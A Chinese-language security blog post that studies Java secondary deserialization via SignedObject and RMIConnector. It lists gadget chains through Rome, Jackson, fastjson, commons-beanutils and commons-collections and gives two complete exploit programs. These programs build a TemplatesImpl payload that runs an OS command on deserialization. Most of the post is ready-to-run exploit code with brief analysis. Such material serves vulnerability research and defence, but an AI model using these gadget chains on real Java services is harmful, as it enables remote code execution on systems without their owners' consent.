二次反序列化学习(一)

admin 2024年1月19日11:51:14评论25 views字数 20825阅读69分25秒阅读模式

为了更好找到银行驻场,学习二次反序列化。

二次反序列化学习(一)SignedObject

0x01 SignedObject分析

比较简单。可以序列化,field可控。太完美了,早入行几年就好了。

java/security/SignedObject.java#getObject()

二次反序列化学习(一)

二次反序列化学习(一)

可以看到这个从content获取流然后进行反序列化。

二次反序列化学习(一)

content是一个byte数组。继承ser。那么无非就是反射赋值,或者构造函数赋值。

二次反序列化学习(一)

构造函数pubilc,直接new就完事了,然后触发getObject()就行。很容易想到jackson,fastjson,cb等来触发javabean的getter来进行触发。

java/security/Signature.java#Map()

private final static Map<String,Boolean> signatureInfo;static {    signatureInfo = new ConcurrentHashMap<String,Boolean>();    Boolean TRUE = Boolean.TRUE;    // pre-initialize with values for our SignatureSpi implementations    signatureInfo.put("sun.security.provider.DSA$RawDSA", TRUE);    signatureInfo.put("sun.security.provider.DSA$SHA1withDSA", TRUE);    signatureInfo.put("sun.security.rsa.RSASignature$MD2withRSA", TRUE);    signatureInfo.put("sun.security.rsa.RSASignature$MD5withRSA", TRUE);    signatureInfo.put("sun.security.rsa.RSASignature$SHA1withRSA", TRUE);    signatureInfo.put("sun.security.rsa.RSASignature$SHA256withRSA", TRUE);    signatureInfo.put("sun.security.rsa.RSASignature$SHA384withRSA", TRUE);    signatureInfo.put("sun.security.rsa.RSASignature$SHA512withRSA", TRUE);    signatureInfo.put("com.sun.net.ssl.internal.ssl.RSASignature", TRUE);    signatureInfo.put("sun.security.pkcs11.P11Signature", TRUE);}

jdk自带算法

根据自带算法,构造Signature的构造函数

KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");KeyPair keyPair = keyPairGenerator.generateKeyPair();PrivateKey privateKey = keyPair.getPrivate();Signature signature = Signature.getInstance("MD2withRSA");signature.initSign(privateKey);SignedObject signedObject = new SignedObject(templates, privateKey,signature );

0x02 多种方法触发SignedObject.getObject()

一、依赖: hashmap->Rome

因为调用SignedObject.getObject()。所以需要gettset来触发。有很多方法。

hashmap.readObject()->hash(key)->key.hashcode->Rome.ObjectBean.hashcode()->EqualsBean.javabeanHashCode()->ToStringBean.java#toString()->SignedObject.getObject()

KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");KeyPair keyPair = keyPairGenerator.generateKeyPair();PrivateKey privateKey = keyPair.getPrivate();Signature signature = Signature.getInstance("MD2withRSA");signature.initSign(privateKey);SignedObject signedObject = new SignedObject(SerObj, privateKey,signature );ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);ObjectBean root = new ObjectBean(ToStringBean.class, toStringBean);HashMap<Object, Object> hashMap1 = new HashMap<>();hashMap1.put(root,"x");

二、依赖: BadAttributeValueExpException->Rome

BadAttributeValueExpException.readObject()->ToStringBean.java#toString()->SignedObject.getObject()

KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");KeyPair keyPair = keyPairGenerator.generateKeyPair();PrivateKey privateKey = keyPair.getPrivate();Signature signature = Signature.getInstance("MD2withRSA");signature.initSign(privateKey);SignedObject signedObject = new SignedObject(SerObj, privateKey,signature );ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);BadAttributeValueExpException val1 = new BadAttributeValueExpException(null);setFieldValue(val1, "val", toStringBean);

三、依赖:jackson

BadAttributeValueExpException.readObject()->jackson.databind.node.POJONode.toString()->om.fasterxml.jackson.databind.node.toString()->com.fasterxml.jackson.databind.ObjectWriter.writeValueAsString()->SignedObject.getObject()

    // 保证能写入序列化数据,利用javassist删除writeReplace()。try {        ClassPool pool_1 = ClassPool.getDefault();        CtClass jsonNode = pool_1.get("com.fasterxml.jackson.databind.node.BaseJsonNode");        CtMethod writeReplace = jsonNode.getDeclaredMethod("writeReplace");        jsonNode.removeMethod(writeReplace);        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();        jsonNode.toClass(classLoader, null);    } catch (Exception e) {    }    KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");    KeyPair keyPair = keyPairGenerator.generateKeyPair();    PrivateKey privateKey = keyPair.getPrivate();    Signature signature = Signature.getInstance("MD2withRSA");    signature.initSign(privateKey);    SignedObject signedObject = new SignedObject(hashMap, privateKey,signature );    POJONode jsonNodes1 = new POJONode(signedObject);    BadAttributeValueExpException val1 = new BadAttributeValueExpException(null);    setFieldValue(val1, "val", jsonNodes1);

四、依赖:fastjson 1.2.48+

HashMap.readObject()->BadAttributeValueExpException.readObject()->BadAttributeValueExpException.toString()->com.alibaba.fastjson.JSONObject.toString()/com.alibaba.fastjson.JSONArray.toString()->com.alibaba.fastjson.JSON.toString()->com.alibaba.fastjson.JSON.toJSONString()->com/alibaba/fastjson/serializer/JSONSerializer.java#write()->com/alibaba/fastjson/serializer/ASMSerializerFactory.javacreateJavaBeanSerializer(SerializeBeanInfo beanInfo) ->SignedObject.getObject()

        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");        KeyPair keyPair = keyPairGenerator.generateKeyPair();        PrivateKey privateKey = keyPair.getPrivate();        Signature signature = Signature.getInstance("MD2withRSA");        signature.initSign(privateKey);        SignedObject signedObject = new SignedObject(SerObj, privateKey,signature );        JSONObject jsonObject = new JSONObject();        jsonObject.put("222",signedObject);//        JSONArray objects = new JSONArray();//        objects.add(signedObject);        BadAttributeValueExpException val1 = new BadAttributeValueExpException(null);        setFieldValue(val1, "val", jsonObject);        HashMap<Object, Object> hashMap1 = new HashMap<>();        hashMap1.put(signedObject,val1);

五、依赖:cb

PriorityQueue.readObect()-> org.apache.commons.beanutils.BeanComparator.compare()->PropertyUtils.getProperty()->SignedObject.getObject()->PropertyUtilsBean.java#getSimpleProperty()->SignedObject.getObject()

    KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");    KeyPair keyPair = keyPairGenerator.generateKeyPair();    PrivateKey privateKey = keyPair.getPrivate();    Signature signature = Signature.getInstance("MD2withRSA");    signature.initSign(privateKey);    SignedObject signedObject = new SignedObject(SerObj, privateKey,signature );BeanComparator<Object> objectBeanComparator = new BeanComparator<>();    setFieldValue(objectBeanComparator,"property","object");    PriorityQueue<Object> priorityQueue = new PriorityQueue<>(1);    setFieldValue(priorityQueue,"comparator",objectBeanComparator);    setFieldValue(priorityQueue,"size",2);    Object[] objects = {signedObject, 1};    setFieldValue(priorityQueue,"queue",objects);

0x03 完整exp

package com.towser;import com.alibaba.fastjson.JSONArray;import com.alibaba.fastjson.JSONObject;import com.fasterxml.jackson.databind.node.POJONode;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import com.sun.syndication.feed.impl.EqualsBean;import com.sun.syndication.feed.impl.ObjectBean;import com.sun.syndication.feed.impl.ToStringBean;import com.tmp.cc.cc5_Templateslmpl;import javassist.ClassPool;import javassist.CtClass;import javassist.CtConstructor;import javassist.CtMethod;import org.apache.commons.beanutils.BeanComparator;import javax.management.BadAttributeValueExpException;import javax.xml.transform.Templates;import java.io.*;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.security.*;import java.util.HashMap;import java.util.PriorityQueue;import java.util.TreeMap;public class signedobject {    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {        final Field field = getField(obj.getClass(), fieldName);        field.set(obj, value);    }    public static Field getField(final Class<?> clazz, final String fieldName) {        Field field = null;        try {            field = clazz.getDeclaredField(fieldName);            field.setAccessible(true);        }        catch (NoSuchFieldException ex) {            if (clazz.getSuperclass() != null)                field = getField(clazz.getSuperclass(), fieldName);        }        return field;    }    public static void main(String[] args) throws Exception {        ClassPool pool = ClassPool.getDefault();        CtClass clazz = pool.makeClass("cmd");        clazz.setSuperclass(pool.get(AbstractTranslet.class.getName()));        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);        constructor.setBody("Runtime.getRuntime().exec("open .");");        clazz.addConstructor(constructor);        byte[][] bytes = new byte[][]{clazz.toBytecode()};        TemplatesImpl templates = TemplatesImpl.class.newInstance();        setFieldValue(templates, "_bytecodes", bytes);        setFieldValue(templates, "_name", "xx");//        setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());//        一、利用链:hashmap->hash(key)->key.hashcode->Rome.EqualsBean.javabeanHashCode()->EqualsBean.toString()->jackson.databind.node.POJONode.toString()->com.fasterxml.jackson.databind.node.toString()->com.fasterxml.jackson.databind.ObjectWriter.writeValueAsString()->templates.getOutputProperties()//        POJONode jsonNodes = new POJONode(templates);//        EqualsBean bean = new EqualsBean(String.class, "22");//        HashMap<Object, Object> hashMap = new HashMap<>();//        hashMap.put(bean,"222");//        setFieldValue(bean,"_obj",jsonNodes);//       二、利用链:HashMap.readObject()->BadAttributeValueExpException.readObject()->BadAttributeValueExpException.toString()->**com.alibaba.fastjson.JSONObject.toString()/com.alibaba.fastjson.JSONArray.toString()**->com.alibaba.fastjson.JSON.toString()->com.alibaba.fastjson.JSON.toJSONString()->com/alibaba/fastjson/serializer/JSONSerializer.java#write()->com/alibaba/fastjson/serializer/ASMSerializerFactory.javacreateJavaBeanSerializer(SerializeBeanInfo beanInfo) ->templates.getOutputProperties()//        JSONObject jsonObject = new JSONObject();//        jsonObject.put("1",templates);////        BadAttributeValueExpException val = new BadAttributeValueExpException(null);//        setFieldValue(val, "val", jsonObject);////        HashMap<Object, Object> hashMap2 = new HashMap<>();//        hashMap2.put(templates,val);//        三、利用链:BadAttributeValueExpException.readObject()->jackson.databind.node.POJONode.toString()->om.fasterxml.jackson.databind.node.toString()->com.fasterxml.jackson.databind.ObjectWriter.writeValueAsString()->templates.getOutputProperties()//        删除 BaseJsonNode 的 writeReplace,使能写入序列化数据        try {            ClassPool pool_1 = ClassPool.getDefault();            CtClass jsonNode = pool_1.get("com.fasterxml.jackson.databind.node.BaseJsonNode");            CtMethod writeReplace = jsonNode.getDeclaredMethod("writeReplace");            jsonNode.removeMethod(writeReplace);            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();            jsonNode.toClass(classLoader, null);        } catch (Exception e) {        }        POJONode jsonNodes = new POJONode(templates);        BadAttributeValueExpException val = new BadAttributeValueExpException(null);        setFieldValue(val, "val", jsonNodes);        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");        KeyPair keyPair = keyPairGenerator.generateKeyPair();        PrivateKey privateKey = keyPair.getPrivate();        Signature signature = Signature.getInstance("MD2withRSA");        signature.initSign(privateKey);        SignedObject signedObject = new SignedObject(val, privateKey,signature );//        一、利用链:hashmap->hash(key)->key.hashcode->Rome.ObjectBean.hashcode()->EqualsBean.javabeanHashCode()->oStringBean.java#toString()->SignedObject.getObject()//        ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);//        ObjectBean root = new ObjectBean(ToStringBean.class, toStringBean);////        HashMap<Object, Object> hashMap1 = new HashMap<>();//        hashMap1.put(root,"x");//        二、BadAttributeValueExpException.readObject()->ToStringBean.java#toString()->SignedObject.getObject()//        ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);//        BadAttributeValueExpException val1 = new BadAttributeValueExpException(null);//        setFieldValue(val1, "val", toStringBean);//        三、BadAttributeValueExpException.readObject()->jackson.databind.node.POJONode.toString()->om.fasterxml.jackson.databind.node.toString()->com.fasterxml.jackson.databind.ObjectWriter.writeValueAsString()->SignedObject.getObject()//        POJONode jsonNodes1 = new POJONode(signedObject);//        BadAttributeValueExpException val1 = new BadAttributeValueExpException(null);//        setFieldValue(val1, "val", jsonNodes1);//        四、HashMap.readObject()->BadAttributeValueExpException.readObject()->BadAttributeValueExpException.toString()->**com.alibaba.fastjson.JSONObject.toString()/com.alibaba.fastjson.JSONArray.toString()**->com.alibaba.fastjson.JSON.toString()->com.alibaba.fastjson.JSON.toJSONString()->com/alibaba/fastjson/serializer/JSONSerializer.java#write()->com/alibaba/fastjson/serializer/ASMSerializerFactory.javacreateJavaBeanSerializer(SerializeBeanInfo beanInfo) ->SignedObject.getObject()////        JSONObject jsonObject = new JSONObject();////        jsonObject.put("222",signedObject);//        JSONArray objects = new JSONArray();//        objects.add(signedObject);////        BadAttributeValueExpException val1 = new BadAttributeValueExpException(null);//        setFieldValue(val1, "val", objects);////        HashMap<Object, Object> hashMap1 = new HashMap<>();//        hashMap1.put(signedObject,val1);//        五、PriorityQueue.readObect()-> org.apache.commons.beanutils.BeanComparator.compare()->PropertyUtils.getProperty()->SignedObject.getObject()->PropertyUtilsBean.java#getSimpleProperty()->SignedObject.getObject()        BeanComparator<Object> objectBeanComparator = new BeanComparator<>();        setFieldValue(objectBeanComparator,"property","object");        PriorityQueue<Object> priorityQueue = new PriorityQueue<>(1);        setFieldValue(priorityQueue,"comparator",objectBeanComparator);        setFieldValue(priorityQueue,"size",2);        Object[] objects = {signedObject, 1};        setFieldValue(priorityQueue,"queue",objects);        FileOutputStream ser2 = new FileOutputStream("ser2");        ObjectOutputStream oos = new ObjectOutputStream(ser2);        oos.writeObject(priorityQueue);        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser2"));        ois.readObject();    }}

RMIConnector

0x01 分析

javax.management.remote.rmi.RMIConnector#findRMIServerJRMP()

二次反序列化学习(一)

二次反序列化学习(一)

可以看到传入base64字节,然后转object流,然后序列化

往上跟

javax.management.remote.rmi.RMIConnector#findRMIServer()

二次反序列化学习(一)

可以看到以“/stub/”开头就会调用findRMIServerJRMP()

javax.management.remote.rmi.RMIConnector#connect()

二次反序列化学习(一)

二次反序列化学习(一)

可以看见rmiServer等于空就回调用findRMIServer()

查看构造方法

二次反序列化学习(一)

二次反序列化学习(一)

可以看见构造方法符合条件。

二次反序列化学习(一)

JMXServiceURL必须为service:jmx:开头。

二次反序列化学习(一)

这里获取JMXServiceURL的URLPATH,然后URLPATH要以/stub/开头,截取第6位到末位的字符传入触发二次反序列化。

所以new一个JMXServiceURL对象,然后反射赋值就行。最后构造RMIConnector。

JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://");setFieldValue(jmxServiceURL, "urlPath", "/stub/"+serbase64);RMIConnector rmiConnector = new RMIConnector(jmxServiceURL, null);

0x02 构造

由于我们要出发connect(),它不是javabean,所以有很多限制,佬们想到的是cc的invoketransfrom来触发。

既然是cc触发,说实话,如大佬所说鸡肋。

cc链触发,很容易想到cc4.0用PriorityQueue,cc 3.2.1一下用lazymap.get()

一、cc6前半

hashmap.readObject()->hash(key)->key.hashcode->tiedMapEntry.hashcode->tiedMapEntry.getValue->lazyMap.get()->invokerTransformer.Transformer()->rmiConnector.connect()

InvokerTransformer invokerTransformer = new InvokerTransformer("connect", null, null);Map<Object,Object> lazyMap = LazyMap.decorate( new HashMap<>(), new ConstantTransformer(1));TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, rmiConnector);HashMap<Object, Object> expMap = new HashMap<>();expMap.put(tiedMapEntry, "xx");lazyMap.clear();setFieldValue(lazyMap,"factory", invokerTransformer);

二、 cc4.0、PriorityQueue

PriorityQueue.readObject()->PriorityQueue.siftDownUsingComparator()->TransformingComparator.comparator()->InvokerTransformer.transformer()

InvokerTransformer transformer = new InvokerTransformer("connect", null, null);TransformingComparator comparator = new TransformingComparator(transformer);PriorityQueue priorityQueue = new PriorityQueue(1);setFieldValue(priorityQueue,"size",2);Object[] objects = {rmiConnector, 1};setFieldValue(priorityQueue,"queue",objects);setFieldValue(priorityQueue,"comparator",comparator);

三、 cc3.2.1 cc4 动态代理

AnnotationInvocationHandler.readObject->AnnotationInvocationHandler.invoke->DefaultedMap.get()->transformerChain.transformer()->InvokerTransformer.transformer()->rmiConnector.connect()

CC4 没有lazymap了, 改用defaultedMap即可。cc1都可以用

Transformer[] transformers = new Transformer[] {        new ConstantTransformer(rmiConnector),        new InvokerTransformer("connect", null, null)};ChainedTransformer transformerChain = new ChainedTransformer(transformers);DefaultedMap<Object, Optional<ConstantTransformer>> defaultedMap =        DefaultedMap.defaultedMap(new HashMap<>(), Optional.of(new ConstantTransformer(1)));setFieldValue(defaultedMap,"value", transformerChain);Class<?> AnnotationInvocationHandler = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor<?> Anotationdeclared =        AnnotationInvocationHandler.getDeclaredConstructor(Class.class, Map.class);Anotationdeclared.setAccessible(true);InvocationHandler h = (InvocationHandler) Anotationdeclared.newInstance(Override.class, defaultedMap);Map Mapproxy =(Map) Proxy.newProxyInstance(Anotationdeclared.getClass().getClassLoader(), new Class[]{Map.class}, h);Object instance = Anotationdeclared.newInstance(Override.class,Mapproxy);

0x03 完整exp

package com.towser;import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;import com.tmp.cc.cc1;import com.tmp.cc.cc5;import javassist.ClassPool;import javassist.CtClass;import org.apache.commons.collections.map.LazyMap;import org.apache.commons.collections4.Transformer;import org.apache.commons.collections4.functors.ChainedTransformer;import org.apache.commons.collections4.functors.ConstantTransformer;import org.apache.commons.collections.functors.InstantiateTransformer;import org.apache.commons.collections4.functors.InvokerTransformer;import org.apache.commons.collections.keyvalue.TiedMapEntry;import org.apache.commons.collections4.comparators.TransformingComparator;import org.apache.commons.collections4.map.DefaultedMap;import javax.management.remote.JMXServiceURL;import javax.management.remote.rmi.RMIConnector;import javax.xml.transform.Templates;import java.io.*;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.nio.file.Files;import java.util.*;public class rmiconnector {    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {        final Field field = getField(obj.getClass(), fieldName);        field.set(obj, value);    }    public static Field getField(final Class<?> clazz, final String fieldName) {        Field field = null;        try {            field = clazz.getDeclaredField(fieldName);            field.setAccessible(true);        }        catch (NoSuchFieldException ex) {            if (clazz.getSuperclass() != null)                field = getField(clazz.getSuperclass(), fieldName);        }        return field;    }    public static void main(String[] args) throws Exception {        File file = new File("ser2");        byte[] fileBytes = Files.readAllBytes(file.toPath());        String base64 = Base64.getEncoder().encodeToString(fileBytes);        JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://");        setFieldValue(jmxServiceURL, "urlPath", "/stub/"+base64);        RMIConnector rmiConnector = new RMIConnector(jmxServiceURL, null);//        一、cc6前半//        hashmap.readObject()->hash(key)->key.hashcode->tiedMapEntry.hashcode->tiedMapEntry.getValue->lazyMap.get()->invokerTransformer.Transformer()->rmiConnector.connect()//        InvokerTransformer invokerTransformer = new InvokerTransformer("connect", null, null);////        Map<Object,Object> lazyMap = LazyMap.decorate( new HashMap<>(), new ConstantTransformer(1));//        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, rmiConnector);////        HashMap<Object, Object> expMap = new HashMap<>();//        expMap.put(tiedMapEntry, "xx");//        lazyMap.clear();//        setFieldValue(lazyMap,"factory", invokerTransformer);//        二、 cc4.0、PriorityQueue//        PriorityQueue.readObject()->PriorityQueue.siftDownUsingComparator()->TransformingComparator.comparator()->InvokerTransformer.transformer()//        InvokerTransformer transformer = new InvokerTransformer("connect", null, null);////        TransformingComparator comparator = new TransformingComparator(transformer);////        PriorityQueue priorityQueue = new PriorityQueue(1);//        setFieldValue(priorityQueue,"size",2);//        Object[] objects = {rmiConnector, 1};//        setFieldValue(priorityQueue,"queue",objects);//        setFieldValue(priorityQueue,"comparator",comparator);//     三、 cc3.2.1 cc4  动态代理//        AnnotationInvocationHandler.readObject->AnnotationInvocationHandler.invoke->DefaultedMap.get()->transformerChain.transformer()->InvokerTransformer.transformer()->rmiConnector.connect()        Transformer[] transformers = new Transformer[] {                new ConstantTransformer(rmiConnector),                new InvokerTransformer("connect", null, null)        };        ChainedTransformer transformerChain = new ChainedTransformer(transformers);        DefaultedMap<Object, Optional<ConstantTransformer>> defaultedMap =                DefaultedMap.defaultedMap(new HashMap<>(), Optional.of(new ConstantTransformer(1)));        setFieldValue(defaultedMap,"value", transformerChain);        Class<?> AnnotationInvocationHandler = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");        Constructor<?> Anotationdeclared =                AnnotationInvocationHandler.getDeclaredConstructor(Class.class, Map.class);        Anotationdeclared.setAccessible(true);        InvocationHandler h = (InvocationHandler) Anotationdeclared.newInstance(Override.class, defaultedMap);        Map Mapproxy =(Map) Proxy.newProxyInstance(Anotationdeclared.getClass().getClassLoader(), new Class[]{Map.class}, h);        Object instance = Anotationdeclared.newInstance(Override.class,Mapproxy);        FileOutputStream ser2 = new FileOutputStream("RMIC2");        ObjectOutputStream oos = new ObjectOutputStream(ser2);        oos.writeObject(instance);        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("RMIC2"));        ois.readObject();    }}

累了,下次再写。

佬的剑招

https://tttang.com/archive/1701/#toc_cc

https://su18.org/

原文始发于微信公众号(黑伞安全):二次反序列化学习(一)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月19日11:51:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   二次反序列化学习(一)https://cn-sec.com/archives/2409617.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息